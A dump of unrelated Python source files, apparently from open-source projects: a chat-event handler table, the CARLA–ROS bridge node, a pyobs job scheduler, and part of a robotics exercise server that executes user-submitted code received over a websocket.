"52:0": self.on_voice_chat_not_answered,
"53:0": self.on_voice_chat_not_cancelled,
"54:0": self.on_voice_chat_not_declined,
"55:0": self.on_video_chat_not_answered,
"56:0": self.on_video_chat_not_cancelled,
"57:0": self.on_video_chat_not_declined,
"58:0": self.on_avatar_chat_not_answered,
"59:0": self.on_avatar_chat_not_cancelled,
"60:0": self.on_avatar_chat_not_declined,
"100:0": self.on_delete_message,
"101:0": self.on_group_member_join,
"102:0": self.on_group_member_leave,
"103:0": self.on_chat_invite,
"104:0": self.on_chat_background_changed,
"105:0": self.on_chat_title_changed,
"106:0": self.on_chat_icon_changed,
"107:0": self.on_voice_chat_start,
"108:0": self.on_video_chat_start,
"109:0": self.on_avatar_chat_start,
"110:0": self.on_voice_chat_end,
"111:0": self.on_video_chat_end,
"112:0": self.on_avatar_chat_end,
"113:0": self.on_chat_content_changed,
"114:0": self.on_screen_room_start,
"115:0": self.on_screen_room_end,
"116:0": self.on_chat_host_transfered,
"117:0": self.on_text_message_force_removed,
"118:0": self.on_chat_removed_message,
"119:0": self.on_text_message_removed_by_admin,
"120:0": self.on_chat_tip,
"121:0": self.on_chat_pin_announcement,
"122:0": self.on_voice_chat_permission_open_to_everyone,
"123:0": self.on_voice_chat_permission_invited_and_requested,
"124:0": self.on_voice_chat_permission_invite_only,
"125:0": self.on_chat_view_only_enabled,
"126:0": self.on_chat_view_only_disabled,
"127:0": self.on_chat_unpin_announcement,
"128:0": self.on_chat_tipping_enabled,
"129:0": self.on_chat_tipping_disabled,
"65281:0": self.on_timestamp_message,
"65282:0": self.on_welcome_message,
"65283:0": self.on_invite_message
}
self.chat_actions_start = {
"Typing": self.on_user_typing_start,
}
self.chat_actions_end = {
"Typing": self.on_user_typing_end,
}
def _resolve_chat_message(self, data):
key = f"{data['o']['chatMessage']['type']}:{data['o']['chatMessage'].get('mediaType', 0)}"
return self.chat_methods.get(key, self.default)(data)
def _resolve_chat_action_start(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_start.get(key, self.default)(data)
def _resolve_chat_action_end(self, data):
key = data['o'].get('actions', 0)
return self.chat_actions_end.get(key, self.default)(data)
def resolve(self, data):
data = json.loads(data)
return self.methods.get(data["t"], self.default)(data)
def call(self, type, data):
if type in self.handlers:
for handler in self.handlers[type]:
handler(data)
def event(self, type):
def registerHandler(handler):
if type in self.handlers:
self.handlers[type].append(handler)
else:
self.handlers[type] = [handler]
return handler
return registerHandler
def on_text_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_image_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_youtube_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_strike_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_sticker_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_EXURL(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def TYPE_USER_SHARE_USER(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_delete_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_join(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_group_member_leave(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_invite(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_background_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_title_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_icon_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_video_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_avatar_chat_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_content_changed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_screen_room_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_host_transfered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_force_removed(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_removed_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_text_message_removed_by_admin(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tip(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_pin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_open_to_everyone(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invited_and_requested(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_voice_chat_permission_invite_only(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_view_only_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_unpin_announcement(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_enabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_chat_tipping_disabled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_timestamp_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_welcome_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_invite_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_start(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def on_user_typing_end(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
def default(self, data): self.call(getframe(0).f_code.co_name, data)
|
bridge.py
|
#!/usr/bin/env python
#
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Rosbridge class:
Class that handle communication between CARLA and ROS
"""
import os
import pkg_resources
try:
import queue
except ImportError:
import Queue as queue
import sys
from distutils.version import LooseVersion
from threading import Thread, Lock, Event
import carla
import ros_compatibility as roscomp
from ros_compatibility.node import CompatibleNode
from carla_ros_bridge.actor import Actor
from carla_ros_bridge.actor_factory import ActorFactory
from carla_ros_bridge.carla_status_publisher import CarlaStatusPublisher
from carla_ros_bridge.debug_helper import DebugHelper
from carla_ros_bridge.ego_vehicle import EgoVehicle
from carla_ros_bridge.world_info import WorldInfo
from carla_msgs.msg import CarlaControl, CarlaWeatherParameters
from carla_msgs.srv import SpawnObject, DestroyObject, GetBlueprints
from rosgraph_msgs.msg import Clock
class CarlaRosBridge(CompatibleNode):
"""
Carla Ros bridge
"""
with open(os.path.join(os.path.dirname(__file__), "CARLA_VERSION")) as f:
CARLA_VERSION = f.read()[:-1]
# in synchronous mode, if synchronous_mode_wait_for_vehicle_control_command is True,
# wait for this time until a next tick is triggered.
VEHICLE_CONTROL_TIMEOUT = 1.
def __init__(self):
"""
Constructor
:param carla_world: carla world object
:type carla_world: carla.World
:param params: dict of parameters, see settings.yaml
:type params: dict
"""
super(CarlaRosBridge, self).__init__("ros_bridge_node")
# pylint: disable=attribute-defined-outside-init
def initialize_bridge(self, carla_world, params):
"""
Initialize the bridge
"""
self.parameters = params
self.carla_world = carla_world
self.ros_timestamp = roscomp.ros_timestamp()
self.callback_group = roscomp.callback_groups.ReentrantCallbackGroup()
self.synchronous_mode_update_thread = None
self.shutdown = Event()
self.carla_settings = carla_world.get_settings()
if not self.parameters["passive"]:
# workaround: settings can only applied within non-sync mode
if self.carla_settings.synchronous_mode:
self.carla_settings.synchronous_mode = False
carla_world.apply_settings(self.carla_settings)
self.loginfo("synchronous_mode: {}".format(
self.parameters["synchronous_mode"]))
self.carla_settings.synchronous_mode = self.parameters["synchronous_mode"]
self.loginfo("fixed_delta_seconds: {}".format(
self.parameters["fixed_delta_seconds"]))
self.carla_settings.fixed_delta_seconds = self.parameters["fixed_delta_seconds"]
carla_world.apply_settings(self.carla_settings)
self.loginfo("Parameters:")
for key in self.parameters:
self.loginfo(" {}: {}".format(key, self.parameters[key]))
# active sync mode in the ros bridge only if CARLA world is configured in sync mode and
# passive mode is not enabled.
self.sync_mode = self.carla_settings.synchronous_mode and not self.parameters["passive"]
if self.carla_settings.synchronous_mode and self.parameters["passive"]:
self.loginfo(
"Passive mode is enabled and CARLA world is configured in synchronous mode. This configuration requires another client ticking the CARLA world.")
self.carla_control_queue = queue.Queue()
# actor factory
self.actor_factory = ActorFactory(self, carla_world, self.sync_mode)
# add world info
self.world_info = WorldInfo(carla_world=self.carla_world, node=self)
# add debug helper
self.debug_helper = DebugHelper(carla_world.debug, self)
# Communication topics
self.clock_publisher = self.new_publisher(Clock, 'clock', 10)
self.status_publisher = CarlaStatusPublisher(
self.carla_settings.synchronous_mode,
self.carla_settings.fixed_delta_seconds,
self)
# for waiting for ego vehicle control commands in synchronous mode,
# their ids are maintained in a list.
# Before tick(), the list is filled and the loop waits until the list is empty.
self._all_vehicle_control_commands_received = Event()
self._expected_ego_vehicle_control_command_ids = []
self._expected_ego_vehicle_control_command_ids_lock = Lock()
if self.sync_mode:
self.carla_run_state = CarlaControl.PLAY
self.carla_control_subscriber = \
self.new_subscription(CarlaControl, "/carla/control",
lambda control: self.carla_control_queue.put(control.command),
qos_profile=10, callback_group=self.callback_group)
self.synchronous_mode_update_thread = Thread(
target=self._synchronous_mode_update)
self.synchronous_mode_update_thread.start()
else:
self.timestamp_last_run = 0.0
self.actor_factory.start()
# register callback to update actors
self.on_tick_id = self.carla_world.on_tick(self._carla_time_tick)
# services configuration.
self._registered_actors = []
self.spawn_object_service = self.new_service(SpawnObject, "/carla/spawn_object",
self.spawn_object)
self.destroy_object_service = self.new_service(DestroyObject, "/carla/destroy_object",
self.destroy_object)
self.get_blueprints_service = self.new_service(GetBlueprints, "/carla/get_blueprints",
self.get_blueprints, callback_group=self.callback_group)
self.carla_weather_subscriber = \
self.new_subscription(CarlaWeatherParameters, "/carla/weather_control",
self.on_weather_changed, qos_profile=10, callback_group=self.callback_group)
def spawn_object(self, req, response=None):
response = roscomp.get_service_response(SpawnObject)
if not self.shutdown.is_set():
try:
id_ = self.actor_factory.spawn_actor(req)
self._registered_actors.append(id_)
response.id = id_
except Exception as e:
self.logwarn("Error spawning object '{}': {}".format(req.type, e))
response.id = -1
response.error_string = str(e)
else:
response.id = -1
response.error_string = 'Bridge is shutting down, object will not be spawned.'
return response
def destroy_object(self, req, response=None):
response = roscomp.get_service_response(DestroyObject)
destroyed_actors = self.actor_factory.destroy_actor(req.id)
response.success = bool(destroyed_actors)
for actor in destroyed_actors:
if actor in self._registered_actors:
self._registered_actors.remove(actor)
return response
def get_blueprints(self, req):
response = roscomp.get_service_response(GetBlueprints)
if req.filter:
bp_filter = req.filter
else:
bp_filter = "*"
response.blueprints = [
bp.id for bp in self.carla_world.get_blueprint_library().filter(bp_filter)]
response.blueprints.extend(self.actor_factory.get_pseudo_sensor_types())
response.blueprints.sort()
return response
def on_weather_changed(self, weather_parameters):
"""
Callback on new weather parameters
:return:
"""
if not self.carla_world:
return
self.loginfo("Applying weather parameters...")
weather = carla.WeatherParameters()
weather.cloudiness = weather_parameters.cloudiness
weather.precipitation = weather_parameters.precipitation
weather.precipitation_deposits = weather_parameters.precipitation_deposits
weather.wind_intensity = weather_parameters.wind_intensity
weather.fog_density = weather_parameters.fog_density
weather.fog_distance = weather_parameters.fog_distance
weather.wetness = weather_parameters.wetness
weather.sun_azimuth_angle = weather_parameters.sun_azimuth_angle
weather.sun_altitude_angle = weather_parameters.sun_altitude_angle
self.carla_world.set_weather(weather)
def process_run_state(self):
"""
process state changes
"""
command = None
# get last command
while not self.carla_control_queue.empty():
command = self.carla_control_queue.get()
while command is not None and roscomp.ok():
self.carla_run_state = command
if self.carla_run_state == CarlaControl.PAUSE:
# wait for next command
self.loginfo("State set to PAUSED")
self.status_publisher.set_synchronous_mode_running(False)
command = self.carla_control_queue.get()
elif self.carla_run_state == CarlaControl.PLAY:
self.loginfo("State set to PLAY")
self.status_publisher.set_synchronous_mode_running(True)
return
elif self.carla_run_state == CarlaControl.STEP_ONCE:
self.loginfo("Execute single step.")
self.status_publisher.set_synchronous_mode_running(True)
self.carla_control_queue.put(CarlaControl.PAUSE)
return
def _synchronous_mode_update(self):
"""
execution loop for synchronous mode
"""
while not self.shutdown.is_set() and roscomp.ok():
self.process_run_state()
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# fill list of available ego vehicles
self._expected_ego_vehicle_control_command_ids = []
with self._expected_ego_vehicle_control_command_ids_lock:
for actor_id, actor in self.actor_factory.actors.items():
if isinstance(actor, EgoVehicle):
self._expected_ego_vehicle_control_command_ids.append(
actor_id)
self.actor_factory.update_available_objects()
frame = self.carla_world.tick()
world_snapshot = self.carla_world.get_snapshot()
self.status_publisher.set_frame(frame)
self.update_clock(world_snapshot.timestamp)
self.logdebug("Tick for frame {} returned. Waiting for sensor data...".format(
frame))
self._update(frame, world_snapshot.timestamp.elapsed_seconds)
self.logdebug("Waiting for sensor data finished.")
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# wait for all ego vehicles to send a vehicle control command
if self._expected_ego_vehicle_control_command_ids:
if not self._all_vehicle_control_commands_received.wait(CarlaRosBridge.VEHICLE_CONTROL_TIMEOUT):
self.logwarn("Timeout ({}s) while waiting for vehicle control commands. "
"Missing command from actor ids {}".format(CarlaRosBridge.VEHICLE_CONTROL_TIMEOUT,
self._expected_ego_vehicle_control_command_ids))
self._all_vehicle_control_commands_received.clear()
def _carla_time_tick(self, carla_snapshot):
"""
Private callback registered at carla.World.on_tick()
to trigger cyclic updates.
After successful locking the update mutex
(only perform trylock to respect bridge processing time)
the clock and the children are updated.
Finally the ROS messages collected to be published are sent out.
:param carla_timestamp: the current carla time
:type carla_timestamp: carla.Timestamp
:return:
"""
if not self.shutdown.is_set():
if self.timestamp_last_run < carla_snapshot.timestamp.elapsed_seconds:
self.timestamp_last_run = carla_snapshot.timestamp.elapsed_seconds
self.update_clock(carla_snapshot.timestamp)
self.status_publisher.set_frame(carla_snapshot.frame)
self._update(carla_snapshot.frame,
carla_snapshot.timestamp.elapsed_seconds)
def _update(self, frame_id, timestamp):
"""
update all actors
:return:
"""
self.world_info.update(frame_id, timestamp)
self.actor_factory.update_actor_states(frame_id, timestamp)
def _ego_vehicle_control_applied_callback(self, ego_vehicle_id):
if not self.sync_mode or \
not self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
return
with self._expected_ego_vehicle_control_command_ids_lock:
if ego_vehicle_id in self._expected_ego_vehicle_control_command_ids:
self._expected_ego_vehicle_control_command_ids.remove(
ego_vehicle_id)
else:
self.logwarn(
"Unexpected vehicle control command received from {}".format(ego_vehicle_id))
if not self._expected_ego_vehicle_control_command_ids:
self._all_vehicle_control_commands_received.set()
def update_clock(self, carla_timestamp):
"""
perform the update of the clock
:param carla_timestamp: the current carla time
:type carla_timestamp: carla.Timestamp
:return:
"""
if roscomp.ok():
self.ros_timestamp = roscomp.ros_timestamp(carla_timestamp.elapsed_seconds, from_sec=True)
self.clock_publisher.publish(Clock(clock=self.ros_timestamp))
def destroy(self):
"""
Function to destroy this object.
:return:
"""
self.loginfo("Shutting down...")
self.shutdown.set()
if not self.sync_mode:
if self.on_tick_id:
self.carla_world.remove_on_tick(self.on_tick_id)
self.actor_factory.thread.join()
else:
self.synchronous_mode_update_thread.join()
self.loginfo("Object update finished.")
self.debug_helper.destroy()
self.status_publisher.destroy()
self.destroy_service(self.spawn_object_service)
self.destroy_service(self.destroy_object_service)
self.destroy_subscription(self.carla_weather_subscriber)
self.carla_control_queue.put(CarlaControl.STEP_ONCE)
for uid in self._registered_actors:
self.actor_factory.destroy_actor(uid)
self.actor_factory.update_available_objects()
self.actor_factory.clear()
super(CarlaRosBridge, self).destroy()
def main(args=None):
"""
main function for carla simulator ROS bridge
maintaining the communication client and the CarlaBridge object
"""
roscomp.init("bridge", args=args)
carla_bridge = None
carla_world = None
carla_client = None
executor = None
parameters = {}
executor = roscomp.executors.MultiThreadedExecutor()
carla_bridge = CarlaRosBridge()
executor.add_node(carla_bridge)
roscomp.on_shutdown(carla_bridge.destroy)
parameters['host'] = carla_bridge.get_param('host', 'localhost')
parameters['port'] = carla_bridge.get_param('port', 2000)
parameters['timeout'] = carla_bridge.get_param('timeout', 2)
parameters['passive'] = carla_bridge.get_param('passive', False)
parameters['synchronous_mode'] = carla_bridge.get_param('synchronous_mode', True)
parameters['synchronous_mode_wait_for_vehicle_control_command'] = carla_bridge.get_param(
'synchronous_mode_wait_for_vehicle_control_command', False)
parameters['fixed_delta_seconds'] = carla_bridge.get_param('fixed_delta_seconds',
0.05)
parameters['register_all_sensors'] = carla_bridge.get_param('register_all_sensors', True)
parameters['town'] = carla_bridge.get_param('town', 'Town01')
role_name = carla_bridge.get_param('ego_vehicle_role_name',
["hero", "ego_vehicle", "hero1", "hero2", "hero3"])
parameters["ego_vehicle"] = {"role_name": role_name}
carla_bridge.loginfo("Trying to connect to {host}:{port}".format(
host=parameters['host'], port=parameters['port']))
try:
carla_client = carla.Client(
host=parameters['host'],
port=parameters['port'])
carla_client.set_timeout(parameters['timeout'])
# check carla version
dist = pkg_resources.get_distribution("carla")
if LooseVersion(dist.version) != LooseVersion(CarlaRosBridge.CARLA_VERSION):
carla_bridge.logfatal("CARLA python module version {} required. Found: {}".format(
CarlaRosBridge.CARLA_VERSION, dist.version))
sys.exit(1)
if LooseVersion(carla_client.get_server_version()) != \
LooseVersion(carla_client.get_client_version()):
carla_bridge.logwarn(
"Version mismatch detected: You are trying to connect to a simulator that might be incompatible with this API. Client API version: {}. Simulator API version: {}"
.format(carla_client.get_client_version(),
carla_client.get_server_version()))
carla_world = carla_client.get_world()
if "town" in parameters and not parameters['passive']:
if parameters["town"].endswith(".xodr"):
carla_bridge.loginfo(
"Loading opendrive world from file '{}'".format(parameters["town"]))
with open(parameters["town"]) as od_file:
data = od_file.read()
carla_world = carla_client.generate_opendrive_world(str(data))
else:
if carla_world.get_map().name != parameters["town"]:
carla_bridge.loginfo("Loading town '{}' (previous: '{}').".format(
parameters["town"], carla_world.get_map().name))
carla_world = carla_client.load_world(parameters["town"])
carla_world.tick()
speed_limit_prc = carla_bridge.get_param('speed_limit_percent', -20)
carla_bridge.loginfo("Setting speed limit percent to {}".format(speed_limit_prc))
tm = carla_client.get_trafficmanager()
tm.global_percentage_speed_difference(speed_limit_prc)
carla_bridge.initialize_bridge(carla_client.get_world(), parameters)
carla_bridge.spin()
except (IOError, RuntimeError) as e:
carla_bridge.logerr("Error: {}".format(e))
except KeyboardInterrupt:
pass
finally:
roscomp.shutdown()
del carla_world
del carla_client
if __name__ == "__main__":
main()
|
jobscheduler.py
|
import logging
import threading
import time
from astroplan import Observer
from astropy.time import TimeDelta
import astropy.units as u
from pyobs.comm import Comm
from pyobs.comm.proxy import Proxy
from pyobs.modules import Module
from pyobs.utils.threads import Future
from pyobs.utils.time import Time
log = logging.getLogger(__name__)
class Job:
def __init__(self, module: str, method: str, params: dict = None):
self.id = None
self.comm = None
self.observer = None
self.abort = None
self.module = module
self.method = method
self.params = {} if params is None else params
self.next_run = None
def __call__(self):
# before we start, we schedule next run
self.next_run = self._schedule_next_run()
# start job in thread
threading.Thread(target=self._run_job).start()
def _run_job(self):
# log start of job
log.info('Starting job #%d on %s.%s...', self.id, self.module, self.method)
start = time.time()
response = None
try:
# get proxy
proxy: Proxy = self.comm[self.module]
# call method
future: Future = proxy.execute(self.method, **self.params)
# wait for it
while not future.is_done():
# abort?
if self.abort.is_set():
log.error('Aborted job #%d on %s.%s after %.2fs.', self.id, self.module, self.method)
# wait for it
self.abort.wait(0.1)
# get response
response = future.wait()
# log end of job
duration = time.time() - start
log.info('Finished job #%d on %s.%s after %.2fs: %s',
self.id, self.module, self.method, duration, str(response))
except:
log.exception('Failed job #%d on %s.%s.', self.id, self.module, self.method)
def _schedule_next_run(self) -> Time:
raise NotImplementedError
class PeriodicJob(Job):
def __init__(self, seconds: int = None, minutes: int = None, hours: int = None, days: int = None, *args, **kwargs):
Job.__init__(self, *args, **kwargs)
# calculate interval
self.interval = 0
self.interval += 0 if seconds is None else seconds
self.interval += 0 if minutes is None else minutes * 60
self.interval += 0 if hours is None else hours * 3600
self.interval += 0 if days is None else days * 86400
# schedule first run
self.next_run = Time.now()
def _schedule_next_run(self) -> Time:
if self.interval:
return Time.now() + TimeDelta(self.interval * u.second)
return Time()
class JobScheduler(Module):
"""Job scheduler."""
__module__ = 'pyobs.modules.utils'
def __init__(self, *args, **kwargs):
"""Initialize a new job scheduler."""
Module.__init__(self, *args, **kwargs)
# last job ID
self.last_id = 0
# jobs
self.jobs = []
def open(self):
"""Open module"""
Module.open(self)
self.add_job(PeriodicJob(module='camera', method='get_binning', seconds=10))
def main(self):
"""Main loop for application."""
while not self.closing.is_set():
# loop all jobs
now = Time.now()
for job in self.jobs:
# need to run?
if job.next_run is not None and now > job.next_run:
job()
# sleep a little
self.closing.wait(1)
def add_job(self, job: Job):
self.last_id += 1
job.id = self.last_id
job.comm = self.comm
job.observer = self.observer
job.abort = self.closing
self.jobs.append(job)
__all__ = ['JobScheduler']
|
exercise.py
|
#!/usr/bin/env python
from __future__ import print_function
from websocket_server import WebsocketServer
import socket
import json
import time
import threading
import sys
from datetime import datetime
import re
import importlib
import cv2
from gui import GUI, ThreadGUI
from hal import HAL
from console import start_console, close_console
class Template:
# Initialize class variables
# self.time_cycle to run an execution for atleast 1 second
# self.process for the current running process
def __init__(self):
self.thread = None
self.reload = False
# Time variables
self.time_cycle = 80
self.ideal_cycle = 80
self.iteration_counter = 0
self.frequency_message = {'brain': '', 'gui': ''}
self.server = None
self.client = None
self.host = sys.argv[1]
# Initialize the GUI, WEBRTC and Console behind the scenes
self.hal = HAL()
self.gui = GUI(self.host, self.hal)
# Client Socket to connect with the person model server
self.model_address = ("127.0.0.1", 36677)
self.model_client = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
# Function for saving
def save_code(self, source_code):
with open('code/academy.py', 'w') as code_file:
code_file.write(source_code)
# Function for loading
def load_code(self):
with open('code/academy.py', 'r') as code_file:
source_code = code_file.read()
return source_code
# Function to parse the code
# A few assumptions:
# 1. The user always passes sequential and iterative codes
# 2. Only a single infinite loop
def parse_code(self, source_code):
# Check for save/load
if(source_code[:5] == "#save"):
source_code = source_code[5:]
self.save_code(source_code)
return "", "", 1
elif(source_code[:5] == "#load"):
source_code = source_code + self.load_code()
self.server.send_message(self.client, source_code)
return "", "", 1
else:
# Get the frequency of operation, convert to time_cycle and strip
try:
# Get the debug level and strip the debug part
debug_level = int(source_code[5])
source_code = source_code[12:]
except:
debug_level = 1
source_code = ""
source_code = self.debug_parse(source_code, debug_level)
sequential_code, iterative_code = self.seperate_seq_iter(source_code)
return iterative_code, sequential_code, debug_level
# Function to parse code according to the debugging level
def debug_parse(self, source_code, debug_level):
if(debug_level == 1):
# If debug level is 0, then all the GUI operations should not be called
source_code = re.sub(r'GUI\..*', '', source_code)
return source_code
# Function to seperate the iterative and sequential code
def seperate_seq_iter(self, source_code):
if source_code == "":
return "", ""
# Search for an instance of while True
infinite_loop = re.search(r'[^ \t]while\(True\):|[^ \t]while True:', source_code)
# Seperate the content inside while True and the other
# (Seperating the sequential and iterative part!)
try:
start_index = infinite_loop.start()
iterative_code = source_code[start_index:]
sequential_code = source_code[:start_index]
# Remove while True: syntax from the code
# And remove the the 4 spaces indentation before each command
iterative_code = re.sub(r'[^ ]while\(True\):|[^ ]while True:', '', iterative_code)
iterative_code = re.sub(r'^[ ]{4}', '', iterative_code, flags=re.M)
except:
sequential_code = source_code
iterative_code = ""
return sequential_code, iterative_code
# The process function
def process_code(self, source_code):
# Redirect the information to console
start_console()
iterative_code, sequential_code, debug_code_level = self.parse_code(source_code)
# Whatever the code is, first step is to just stop!
self.hal.motors.sendV(0)
self.hal.motors.sendW(0)
# print("The debug level is " + str(debug_level)
# print(sequential_code)
# print(iterative_code)
# The Python exec function
# Run the sequential part
gui_module, hal_module = self.generate_modules()
reference_environment = {"GUI": gui_module, "HAL": hal_module}
exec(sequential_code, reference_environment)
# Run the iterative part inside template
# and keep the check for flag
while self.reload == False:
start_time = datetime.now()
# Execute the iterative portion
exec(iterative_code, reference_environment)
# Template specifics to run!
finish_time = datetime.now()
dt = finish_time - start_time
ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0
# Keep updating the iteration counter
if (iterative_code == ""):
self.iteration_counter = 0
else:
self.iteration_counter = self.iteration_counter + 1
# The code should be run for atleast the target time step
# If it's less put to sleep
if (ms < self.time_cycle):
time.sleep((self.time_cycle - ms) / 1000.0)
close_console()
print("Current Thread Joined!")
# Function to generate the modules for use in ACE Editor
def generate_modules(self):
# Define HAL module
hal_module = importlib.util.module_from_spec(importlib.machinery.ModuleSpec("HAL", None))
hal_module.HAL = importlib.util.module_from_spec(importlib.machinery.ModuleSpec("HAL", None))
# Add HAL functions
#hal_module.HAL.getImage = self.hal.getImage
hal_module.HAL.setV = self.hal.setV
hal_module.HAL.setW = self.hal.setW
hal_module.HAL.getLaserData = self.hal.getLaserData
hal_module.HAL.getPose3d = self.hal.getPose3d
hal_module.HAL.getImage = self.hal.getImage
hal_module.HAL.getBoundingBoxes = self.hal.getBoundingBoxes
# Define GUI module
gui_module = importlib.util.module_from_spec(importlib.machinery.ModuleSpec("GUI", None))
gui_module.GUI = importlib.util.module_from_spec(importlib.machinery.ModuleSpec("GUI", None))
# Add GUI functions
gui_module.GUI.showImage = self.gui.showImage
# Adding modules to system
# Protip: The names should be different from
# other modules, otherwise some errors
sys.modules["HAL"] = hal_module
sys.modules["GUI"] = gui_module
return gui_module, hal_module
# Function to measure the frequency of iterations
def measure_frequency(self):
previous_time = datetime.now()
# An infinite loop
while self.reload == False:
# Sleep for 2 seconds
time.sleep(2)
# Measure the current time and subtract from the previous time to get real time interval
current_time = datetime.now()
dt = current_time - previous_time
ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0
previous_time = current_time
# Get the time period
try:
# Division by zero
self.ideal_cycle = ms / self.iteration_counter
except:
self.ideal_cycle = 0
# Reset the counter
self.iteration_counter = 0
# Function to generate and send frequency messages
def send_frequency_message(self):
# This function generates and sends frequency measures of the brain and gui
brain_frequency = 0; gui_frequency = 0
try:
brain_frequency = round(1000 / self.ideal_cycle, 1)
except ZeroDivisionError:
brain_frequency = 0
try:
gui_frequency = round(1000 / self.thread_gui.ideal_cycle, 1)
except ZeroDivisionError:
gui_frequency = 0
self.frequency_message["brain"] = brain_frequency
self.frequency_message["gui"] = gui_frequency
message = "#freq" + json.dumps(self.frequency_message)
self.server.send_message(self.client, message)
# Function to maintain thread execution
def execute_thread(self, source_code):
# Keep checking until the thread is alive
# The thread will die when the coming iteration reads the flag
if(self.thread != None):
while self.thread.is_alive() or self.measure_thread.is_alive():
pass
# Turn the flag down, the iteration has successfully stopped!
self.reload = False
# New thread execution
self.measure_thread = threading.Thread(target=self.measure_frequency)
self.thread = threading.Thread(target=self.process_code, args=[source_code])
self.thread.start()
self.measure_thread.start()
print("New Thread Started!")
# Function to read and set frequency from incoming message
def read_frequency_message(self, message):
frequency_message = json.loads(message)
# Set brain frequency
frequency = float(frequency_message["brain"])
self.time_cycle = 1000.0 / frequency
# Set gui frequency
frequency = float(frequency_message["gui"])
self.thread_gui.time_cycle = 1000.0 / frequency
return
# The websocket function
# Gets called when there is an incoming message from the client
def handle(self, client, server, message):
if(message[:5] == "#freq"):
frequency_message = message[5:]
self.read_frequency_message(frequency_message)
self.send_frequency_message()
return
try:
